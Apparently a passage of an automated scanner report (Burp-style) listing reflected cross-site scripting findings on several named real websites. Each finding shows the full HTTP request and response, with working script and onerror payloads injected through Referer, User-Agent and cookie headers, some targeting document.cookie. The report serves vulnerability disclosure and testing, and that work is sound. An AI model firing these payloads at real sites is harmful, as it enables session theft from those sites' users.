The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 492f0<script>alert(1)</script>34eb159046a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:05 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1493
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a<img src=a onerror=alert(String.fromCharCode(88,83,83))>e6e3afeb687/</b> wa
...[SNIP]...
</script>34eb159046a">http://www.google.com/search?hl=en&q=492f0<script>alert(1)</script>34eb159046a</a>
...[SNIP]...

4.1986. http://www.washington.edu/alpinef972ae6e3afeb687/ [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83))>e6e3afeb687/

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 2ae36<script>alert(1)</script>e3eb2d74228 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83))>e6e3afeb687/ HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)2ae36<script>alert(1)</script>e3eb2d74228
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:04 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1266
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a<img src=a onerror=alert(String.fromCharCode(88,83,83))>e6e3afeb687/</b> wa
...[SNIP]...
<br>
Browser: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)2ae36<script>alert(1)</script>e3eb2d74228<br>
...[SNIP]...

4.1987. http://www.washington.edu/alpinef972a previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpinef972a<img%20src=a%20onerror=alert(document.cookie

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53c75"><script>alert(1)</script>f39259fbf77 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /alpinef972a<img%20src=a%20onerror=alert(document.cookie HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=53c75"><script>alert(1)</script>f39259fbf77

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:04 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1412
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a<img src=a onerror=alert(document.cookie</b> was not found or is no longer on
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=53c75"><script>alert(1)</script>f39259fbf77">
...[SNIP]...

4.1988. http://www.washington.edu/alpinef972a previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpinef972a<img%20src=a%20onerror=alert(document.cookie

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 69385<script>alert(1)</script>a6f6fa4a2dc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:05 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1404
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a<img src=a onerror=alert(document.cookie</b> was not found or is no longer on
...[SNIP]...
</script>a6f6fa4a2dc">http://www.google.com/search?hl=en&q=69385<script>alert(1)</script>a6f6fa4a2dc</a>
...[SNIP]...

4.1989. http://www.washington.edu/alpinef972a previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpinef972a<img%20src=a%20onerror=alert(document.cookie

Issue detail

The value of the Referer HTTP header is copied into the name of an HTML tag attribute. The payload 8b38e><script>alert(1)</script>88306eec07b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:04 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1260
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a<img src=a onerror=alert(document.cookie</b> was not found or is no longer on
...[SNIP]...
<img src=a onerror=alert(document.cookie, referer: 8b38e><script>alert(1)</script>88306eec07b.</br>
...[SNIP]...

4.1990. http://www.washington.edu/alpinef972a previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpinef972a<img%20src=a%20onerror=alert(document.cookie

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload bf01d><script>alert(1)</script>a78c347ab3f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:04 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1408
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a<img src=a onerror=alert(document.cookie</b> was not found or is no longer on
...[SNIP]...
<img src=a onerror=alert(document.cookie, referer: http://www.google.com/search?hl=en&q=bf01d><script>alert(1)</script>a78c347ab3f.</br>
...[SNIP]...

4.1991. http://www.washington.edu/alpinef972a previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpinef972a<img%20src=a%20onerror=alert(document.cookie

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload a38ec<script>alert(1)</script>b29724d166e was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /alpinef972a<img%20src=a%20onerror=alert(document.cookie HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a38ec<script>alert(1)</script>b29724d166e
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:00 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1177
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a<img src=a onerror=alert(document.cookie</b> was not found or is no longer on
...[SNIP]...
<br>
Browser: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a38ec<script>alert(1)</script>b29724d166e<br>
...[SNIP]...

4.1992. http://www.washington.edu/alpinef972ae6e3afeb687/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpinef972a<img%20src=a%20onerror=alert(document.cookie)>e6e3afeb687/

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 63899<script>alert(1)</script>2920147a5c6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /alpinef972a<img%20src=a%20onerror=alert(document.cookie)>e6e3afeb687/ HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=63899<script>alert(1)</script>2920147a5c6

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:04 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1451
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a<img src=a onerror=alert(document.cookie)>e6e3afeb687/</b> was not found or
...[SNIP]...
</script>2920147a5c6">http://www.google.com/search?hl=en&q=63899<script>alert(1)</script>2920147a5c6</a>
...[SNIP]...

4.1993. http://www.washington.edu/alpinef972ae6e3afeb687/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpinef972a<img%20src=a%20onerror=alert(document.cookie)>e6e3afeb687/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10da7"><script>alert(1)</script>2c7b19061dd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:01 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1459
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a<img src=a onerror=alert(document.cookie)>e6e3afeb687/</b> was not found or
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=10da7"><script>alert(1)</script>2c7b19061dd">
...[SNIP]...

4.1994. http://www.washington.edu/alpinef972ae6e3afeb687/ [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpinef972a<img%20src=a%20onerror=alert(document.cookie)>e6e3afeb687/

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload c9a58<script>alert(1)</script>c39d6e840fd was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /alpinef972a<img%20src=a%20onerror=alert(document.cookie)>e6e3afeb687/ HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c9a58<script>alert(1)</script>c39d6e840fd
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:59 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1224
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a<img src=a onerror=alert(document.cookie)>e6e3afeb687/</b> was not found or
...[SNIP]...
<br>
Browser: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c9a58<script>alert(1)</script>c39d6e840fd<br>
...[SNIP]...

4.1995. http://www25.big.jp/~jam/leafnode+/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www25.big.jp
Path:	/~jam/leafnode+/

Issue detail

The value of the Referer HTTP header is copied into the HTML document as text between TITLE tags. The payload c1b07</title><script>alert(1)</script>ccaaf7c0f74 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /~jam/leafnode+/ HTTP/1.1
Host: www25.big.jp
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=c1b07</title><script>alert(1)</script>ccaaf7c0f74

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:02:14 GMT
Server: Apache/2.2.15 (Unix) DAV/2
Content-Length: 2514
Connection: close
Content-Type: text/html; charset=UTF-8

<Html Lang="ja">
<Head>
<Title>c1b07</title><script>alert(1)</script>ccaaf7c0f74 | www25.big.jp/~jam/leafnode+/</Title>
<Meta Http-equiv="content-type" Content="text/html; charset=utf-8">
<LINK href=
...[SNIP]...

4.1996. http://www25.big.jp/~jam/leafnode+/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www25.big.jp
Path:	/~jam/leafnode+/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f30c8"><script>alert(1)</script>13cdfeef9c5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:02:12 GMT
Server: Apache/2.2.15 (Unix) DAV/2
Content-Length: 2490
Connection: close
Content-Type: text/html; charset=UTF-8

<Html Lang="ja">
<Head>
<Title>f30c8"><script>alert(1)</script>13cdfeef9c5 | www25.big.jp/~jam/leafnode+/</Title>
<Meta Http-equiv="content-type" Content="text/html; charset=utf-8">
<LINK href="/styl
...[SNIP]...
<Meta Name="keywords" Content="f30c8"><script>alert(1)</script>13cdfeef9c5">
...[SNIP]...

4.1997. http://newsguy.com/user_info.asp [DIGEST cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newsguy.com
Path:	/user_info.asp

Issue detail

The value of the DIGEST cookie is copied into the HTML document as plain text between tags. The payload a8a96<script>alert(1)</script>4d8999f6908 was submitted in the DIGEST cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /user_info.asp?0.2662578278686851 HTTP/1.1
Host: newsguy.com
Proxy-Connection: keep-alive
Referer: http://newsguy.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256a8a96<script>alert(1)</script>4d8999f6908; session-id=07e5e76216ca9266b6006a1955c20780

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:03:20 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=041e224072a92fd25140de5fddcf5682; path=/
Content-Length: 118
Expires: Mon, 24 Jan 2011 22:03:19 GMT
Cache-Control: no-cache
Content-Type: text/html

DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256a8a96<script>alert(1)</script>4d8999f6908
USERID=
DNDDATA=+
MAILDATA=

4.1998. http://www.autobytel.com/ [BDATALIST cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b40ac"%3balert(1)//0051c4cf45b was submitted in the BDATALIST cookie. This input was echoed as b40ac";alert(1)//0051c4cf45b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4b40ac"%3balert(1)//0051c4cf45b; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:45:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:45:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:45:46 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 71059

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4b40ac";alert(1)//0051c4cf45b";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "482E9FD5-C3E3-1C76-F4759E43
...[SNIP]...

4.1999. http://www.autobytel.com/ [ENTERED_POSTAL_CODE_VCH cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea9fc"%3balert(1)//a7580a5b82d was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as ea9fc";alert(1)//a7580a5b82d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=ea9fc"%3balert(1)//a7580a5b82d; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 71031
Expires: Mon, 24 Jan 2011 23:56:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:56:52 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:56:52 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...

               s.prop8 = "home|mtu";

           //s.prop9 = "home|Search Engine Optimization Project|13148";
           s.prop10 = "home|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "ea9fc";alert(1)//a7580a5b82d||";

           s.prop14 = "home : Search Engine Optimization Project entry page";
           s.prop15 = "No Article|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "home||||||Search Engine Op
...[SNIP]...

4.2000. http://www.autobytel.com/ [PV_CT cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/

Issue detail

The value of the PV_CT cookie is copied into the HTML document as plain text between tags. The payload 85f6a<img%20src%3da%20onerror%3dalert(1)>f2e1e159d1b was submitted in the PV_CT cookie. This input was echoed as 85f6a<img src=a onerror=alert(1)>f2e1e159d1b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
